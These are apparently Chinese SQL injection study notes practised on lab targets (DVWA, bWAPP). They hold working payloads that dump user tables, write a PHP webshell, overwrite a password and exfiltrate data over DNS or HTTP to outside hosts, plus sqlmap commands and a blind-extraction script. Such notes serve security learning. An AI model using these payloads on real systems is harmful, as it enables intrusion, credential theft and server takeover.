Sql Inject
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:
- 对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
- 使用参数化(Parameterized Query 或 Parameterized Statement);
- 还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!
common
注释
#或者打空格
--+payload
where id = '$id'
' or '1' = '1' or 1=1 #URL encoding
1' OR 1=1 -- → 1%27%20||%201=1%20--+ → 1%27%20%7C%7C%201%3D1%20%2D%2D+
%27is the URL encoding for the single quote (').%20is the URL encoding for a space ( ).||represents the SQL OR operator.%7C%7Cis the URL encoding for||.%3Dis the URL encoding for the equals sign (=).%2D%2Dis the URL encoding for --, which starts a comment in SQL.+add a space after the comment, ensuring that the comment is properly terminated and there are no syntax issues.
判断是否为注入点
where id = '$id'
1' and '1'='11' and 1=1 #判断查询字段数目
1' order by 3 #确定回显字段
1' union select 1,2,3 limit 1,1 #' union select 1,2,3 #union注入
union联合查询
- 可以一次性执行两个或多个查询,并将它们的结果组合在一起输出。
- 所有查询中的列数必须相同,以第一个查询为准。
查询当前操作数据库对应的信息
1' union select 1,user(),database(),version(),group_concat(table_name),6,7 from information_schema.tables where table_schema = database() #查询数据库
' union select 1,group_concat(schema_name) from information_schema.schemata #查询当前操作的数据库
' union select 1,database() #查询指定数据库的表
' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'dvwa' #查询指定表的字段
' union select 1,group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name = 'users' #查看数据
' union select 1,group_concat(username,':',password SEPARATOR '<br>') from dvwa.users #通过SQL注入向靶机中读取写入
读取
' union select 1,load_file('/flag.txt'),3 #写入
- 必须要保证mysql用户对指定目录具有写入权限
- 文件路径必须用绝对路径
' union select 1,"<?php @eval($_REQUEST['pass']);?>",3 into outfile '/var/www/html/uploads/shell.php' #sqlmap
自动化注入工具sqlmap
- sqlmap利用Python开发,运行sqlmap需要有Python环境,推荐在Kali中使用。
注释符 --+
- 注释符
#在URL中需要编码为%23 - 在URL中通常使用
--+来代替#,+是空格的URL编码。
基本用法
# 检测注入点
sqlmap -u "http://xxx?id=1"
# 查询所有数据库
sqlmap -u "http://xxx?id=1" --dbs
available databases [4]:
[*] information_schema
[*] mysql
[*] note
[*] performance_schema
# 查询当前操作的数据库
sqlmap -u "http://xxx?id=1" --current-db
current database: 'note'
# 查询指定数据库的表 -D 数据库名
sqlmap -u "http://xxx?id=1" --tables -D note
[2 tables]
+-------+
| fl4g |
| notes |
+-------+
# 查询指定表的字段 -T 表名
sqlmap -u "http://xxx?id=1" --columns -T fl4g -D note
+---------+-------------+
| Column | Type |
+---------+-------------+
| fllllag | varchar(40) |
+---------+-------------+
# 导出数据 --dump ; -C 字段名
sqlmap -u "http://xxx?id=1" --dump -C fllllag -T fl4g -D note
+---------------------------------+
| fllllag |
+---------------------------------+
| n1book{union_select_is_so_cool} |
+---------------------------------+可选操作
# 判断当前用户是否为数据库管理员
sqlmap -u "http://xxx?id=1" --is-dba
current user is DBA: True
# 获取当前用户
sqlmap -u "http://xxx?id=1" --current-user
current user: 'root@localhost'sqlmap指定User-Agent
通过指定User-Agent绕过服务器限制
-AAGENT 指定User-Agent--random-agent使用随机User-Agent--mobileImitate(模仿) smartphone through HTTP User-Agent header
sqlmap -u "http://xxx" --random-agentsqlmap加载cookie
- 通过
--cookie=COOKIE 选项加载cookie,可以用于需要身份验证情况下的注入。
sqlmap -u "http://xxx" --cookie="COOKIE"post型注入
- 通过
--data选项指定post方法传递的数据
sqlmap -u "http://xxx/index.php" --data="id=1"- 通过
-r选项加载HTTP请求文件,用-p选项指定要检测的参数。
sqlmap -r "post.txt" -p "id"通过sqlmap获取Shel
- 需要知道网站的主目录,且有一个具有 写 权限的目录
sqlmap -r "post.txt" --os-shellStacked
堆叠注入(Stacked Injections)堆叠注入则允许攻击者在原本的查询语句后面,通过分号;结束当前语句,然后额外追加一条或多条全新的 SQL 语句。
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );修改为
mysqli_multi_query($GLOBALS["___mysqli_ston"], $query);
$result = mysqli_use_result($GLOBALS["___mysqli_ston"]);payload
1'; update users set password='e10adc3949ba59abbe56e057f20f883e' where user_id=1; --In-Band
Error-Based
MySQL 的报错注入主要是利用 MySQL 的一些逻辑漏洞,如 BigInt 大数溢出等,由此可以将 MySQL 报错注入主要分为以下几类:
- BigInt 等数据类型溢出
- XPath 语法错误
count()+rand()+group_by()导致重复- 空洞数据类型函数错误
很多函数会导致 MySQL 报错并显示数据:
floor函数;extractvalue函数;(最多32字符)updatxml函数;exp()函数;
floor、rand(0)和group by

select count(*),concat((select user()), floor(rand(0)*2)) x from information_schema.TABLES group by xextractvalue
select extractvalue(1, concat(0x7e, (select @@version)));payload
?id=1' and extractvalue(1, concat(0x7e, (select @@version))) -- '0x7e代表~:concat(0x7e, (select @@version))会将波浪号~和数据库版本信息连接在一起(例如:~5.7.26)。extractvalue()函数的作用是从 XML 中提取数据,它的第二个参数必须是符合 XPath 语法格式的路径。- 制造非法路径:由于路径以波浪号
~开头,不符合 XPath 的语法规范,数据库会因为语法错误而抛出异常。 - 获取敏感信息:数据库在报错时,会将这个不合法的路径(连同我们拼接进去的
@@version版本信息)直接显示在错误信息中。例如:1105 - XPATH syntax error: '~5.7.26'
updatxml
select updatexml(1,concat(0x7e,(SELECT @@version)),1);1105 - XPATH syntax error: '~5.7.26'
payload
?id=2' and updatexml(1,concat(0x7e,(SELECT @@version)),1) -- 'updatexml(xml_target, xpath_expression, new_xml)这是一个 MySQL 用于修改 XML 数据的内置函数。它接收三个参数:xml_target:目标 XML 内容或文档。xpath_expression:用于定位要修改的 XML 节点的 XPath 路径。new_xml:替换后的新 XML 内容。
exp()
select exp(~(select * from (select database())x));DOUBLE value is out of range in ...
exp() 双精度溢出报错
exp(x)函数:该函数用于计算自然对数底数的 次方(即 )。 - 溢出条件:在计算机中,双精度浮点数能表示的最大值是有限的。在 MySQL 中,当
exp()的参数大于约 709.78时,计算结果就会超出双精度浮点数的最大范围,从而触发 "Double value out of range"(双精度数值超出范围) 的溢出错误。 - 信息回显:在 MySQL 5.5.x 等较早版本中,当
exp()发生溢出报错时,数据库会将导致溢出的查询结果作为错误信息的一部分返回给客户端。
实战
靶机:DVWA SQL Injection
' and extractvalue(1, concat(0x7e, (select database()))) --XPATH syntax error: '~dvwa'
' and extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='dvwa' ))) --XPATH syntax error: '~guestbook,users'
' and extractvalue(1, concat(0x7e, (select column_name from information_schema.columns where table_schema = 'dvwa' and table_name = 'users' limit 4,1 ))) --XPATH syntax error: '~password'
' and extractvalue(1, mid(concat(0x7e, (select password from dvwa.users limit 0,1)),1,29)) --XPATH syntax error: '~5f4dcc3b5aa765d61d8327deb882'
mid()函数:字符串截取,MID(str, start, length)
Blind
Time-Based
时间盲注常用函数

靶场bWAPP: SQL Injection - Blind - Time-Based
# 慢(true)
World War Z' and length(database())>3 and sleep(2) --
# 快(false)
World War Z' and length(database())>5 and sleep(2) --
# 慢(true)
World War Z' and length(database())>4 and sleep(2) --
# 慢(true)
World War Z' and length(database())=5 and sleep(2) --# 快(false)
World War Z' and substr(database(),1,1)='a' and sleep(2) --
# 慢(true) 说明第一个字符是b
World War Z' and substr(database(),1,1)='b' and sleep(2) --
World War Z' and ascii(substr(database(),1,1))=98 and sleep(2) --
...
# 慢(true) 说明前两个字符是bW
World War Z' and substr(database(),1,2)='bW' and sleep(2) --
World War Z' and ascii(substr(database(),2,1))=87 and sleep(2) --
...时间盲注 自动化代码
#!/usr/bin/python
#coding:utf-8
import requests
import time
#ip地址和登录payload
ip_port='127.0.0.1:80'
data={
"login":"fairy",
"password":"123qwe",
"security_level":"0",
"form":"submit"
}
#通过requests库 构建会话并维持登录状态
urlLogin="http://%s/login.php"%ip_port
session=requests.session()
resp=session.post(urlLogin, data)
#获取数据库名称长度
num=0
for i in range(1,21):
url="http://%s/sqli_15.php?title=World War Z' and length(database())=%d and sleep(2) -- &action=search"%(ip_port, i)
startTime = time.time()
rsp = session.get(url)
endTime = time.time()
ga = endTime - startTime
if ga > 1:
print("length of database name is %d"%i)
print("startTime", startTime)
print("endTime", endTime)
num = i
break
#获取数据库名字
l = []
for j in range(1, num+1):
for k in range(33, 128):
url="http://%s/sqli_15.php?title=World War Z' and ascii(substr(database(),%d,1))=%d and sleep(2) -- &action=search"%(ip_port, j, k)
startTime = time.time()
rsp = session.get(url)
endTime = time.time()
ga = endTime - startTime
if ga > 1:
print(f'第{j}个字符:{chr(k)}')
l.append(chr(k))
break
print("name of database is ", ''.join(l))OOB

OOB 注入(Out-of-Band Injection,带外注入)可以让目标服务器自己化身为“内鬼”,主动通过另外一个独立的网络通道(比如 DNS 或 HTTP),把数据送到攻击者的服务器上。
带外通道技术通常需要脆弱的实体来生成带外的TCP/UDP/ICMP请求,然后,攻击者可以通过这个请求来提取数据。
一次OOB攻击能够成功是基于:
- 存在漏洞的系统;
- 外围防火墙的出站请求。
DNS迭代查询
- 域名系统(Domain Name System,缩写:DNS)是互联网的一项服务。它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。
- DNS使用TCP和UDP端口53。
- 当前,对于每一级域名长度的限制是63个字符,域名总长度则不能超过253个字符。
DNS迭代查询原理
- 首先有一个可以配置的域名test.com。
- 通过代理商设置域名test.com的nameserver为自己拥有的服务器(S)的IP。
- 然后在S上搭建DNSServer。
- 这样test.com及其所有子域名的查询都会推送到S上,同时S也能够实时的监控针对test.com的查询请求。
泛域名解析
泛域名解析就是利用通配符的方式将所有的次级域名指向同一IP。
*.example.com IP : www.example.com 和 abc.example.com 都会访问到同一个站点。
tcpdump
基于Unix系统的命令行的数据报嗅探工具,可以抓取流动在网卡上的数据包。
原理:
Linux抓包是通过注册一种虚拟的底层网络协议来完成对网络报文(准确的是网络设备)消息的处理权。
系统在收到报文的时候就会给这个伪协议一次机会,让它对网卡收到的报文进行一次处理,此时该模块就会趁机对报文进行窥探。
监听DNS信息
tcpdump–n port 53实施带外注入
带外注入可以简化盲注的过程,可以直接将查询到的结果通过DNS记录显示出来。
payload
select load_file(concat("\\\\",(select database()), ".7as54b.ceye.io\\abc"));获取数据库名
?id=1' and load_file(concat("\\\\",(select database()), ".7as54b.ceye.io\\abc"))--+获取表名
?id=1' and load_file(concat('\\\\',(select table_name from information_schema.tables
where table_schema='test' limit 0,1),".7as54b.ceye.io\\abc")) --+大文本传输
substr对文件内容进行切片to_base64对切片的内容进行编码concat将编码后的内容与域名进行拼接load_file访问该UNC路径
select concat(to_base64(substr(load_file("C:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\my.ini"),1,15)),".example.com") as result;HTTP带外注入
UTL_HTTP.request
Oracle 发起HTTP请求 UTL_HTTP.REQUEST ( url IN VARCHAR2, proxy IN VARCHAR2 DEFAULT NULL);
- url:目标服务器地址
- porxy:代理服务器地址,该参数为可选参数
它的返回类型是长度为2000或更短的字符串,它包含从HTTP请求返回到参数URL的HTML结果的前2000个字节。

通过SQL注入让目标服务器执行
select UTL_HTTP.request('http://192.168.25.166/test.php'||'?id='||(select version from v$instance)) from dual;在192.168.25.166 上的 test.php 会记录传递来的数据,并写入test.txt文件中。
混淆和绕过
普通的注入方式过于明显,很容易被检测。因此,需要改变攻击的手法,绕过检测和过滤,即混淆和绕过。具体操作针对于服务端和WAF的防御机制有多种手段。


